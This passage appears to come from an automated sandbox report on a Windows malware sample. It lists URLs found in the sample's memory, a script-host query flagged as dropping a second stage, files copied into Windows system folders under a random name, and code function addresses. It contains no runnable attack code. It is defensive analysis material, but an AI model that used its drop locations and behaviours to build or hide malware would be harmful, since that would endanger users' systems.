0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                          Source: qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013873000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013439000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013A73000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000135A2000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000130D0000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000128AF000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000133A1000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012E86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000139A3000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013239000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C59000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012A17000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.00000000137DA000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013CC6000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001390B000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013B0C000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013672000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012D1E000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000012C86000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.0000000013169000.00000004.00000800.00020000.00000000.sdmp, qvQdgMbCgPRxtGlzSvteAOftUbVX.exe, 0000000D.00000002.2868890659.000000001350A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                          System Summary

                          barindex
                          Windows Scripting host queries suspicious COM object (likely to drop second stage)
                          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                          Source: C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_00366FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00366FAA
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Windows\CbsTemp\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Windows\CbsTemp\d6e33f2cde6d42Jump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Windows\Help\mui\qvQdgMbCgPRxtGlzSvteAOftUbVX.exeJump to behavior
                          Source: C:\PortCommon\hyperbrokerhostNetsvc.exeFile created: C:\Windows\Help\mui\d6e33f2cde6d42Jump to behavior
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0036848E0_2_0036848E
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_00376CDC0_2_00376CDC
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_003700B70_2_003700B7
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_003740880_2_00374088
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_003640FE0_2_003640FE
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_003771530_2_00377153
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_003851C90_2_003851C9
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_003632F70_2_003632F7
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_003762CA0_2_003762CA
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_003743BF0_2_003743BF
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0036C4260_2_0036C426
                          Source: C:\Users\user\Desktop\CJF0Ri1HrG.exeCode function: 0_2_0036F4610_2_0036F461
